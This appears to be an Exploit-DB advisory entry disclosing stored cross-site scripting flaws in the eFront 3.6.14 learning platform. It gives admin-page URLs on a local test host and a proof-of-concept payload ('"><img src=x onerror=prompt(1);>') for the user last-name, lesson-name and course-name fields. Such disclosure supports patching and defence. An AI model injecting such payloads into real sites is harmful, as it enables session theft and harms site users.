eFront 3.6.14 (build 18012) - Multiple Persistent Cross-Site Scripting Vulnerabilities

EDB-ID:

30213

CVE:

2013-7194

EDB Verified:

Author:

sajith

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2013-12-11

Vulnerable App:

###########################################################

Exploit-DB Note: Screenshot provided by exploit author.

###########################################################
[~] Exploit Title: eFront v3.6.14 (build 18012) -Stored XSS in multiple
Parameters
[~] Author: sajith
[~] version: eFront v3.6.14- build 18012
[~]Vendor Homepage: http://www.efrontlearning.net/
[~] vulnerable app link:http://www.efrontlearning.net/download
###########################################################



POC by sajith shetty:

[###]Log in with admin account and create new user

http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=personal&user=root&op=profile&add_user=1

(Home � Users � Administrator S. (root) � New user)

Here "Last name" field is vulnerable to stored XSS [payload:"><img src=x
onerror=prompt(1);>  ]



[###]create new lesson option (
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php
?

ctg=lessons&add_lesson=1) where "Lession name" is vulnerable to stored xss

[payload:"><img src=x onerror=prompt(1);>  ]



[###]create new courses option(
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php
?

ctg=courses&add_course=1) where "Course name:" filed is vulnerable to
stored XSS

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services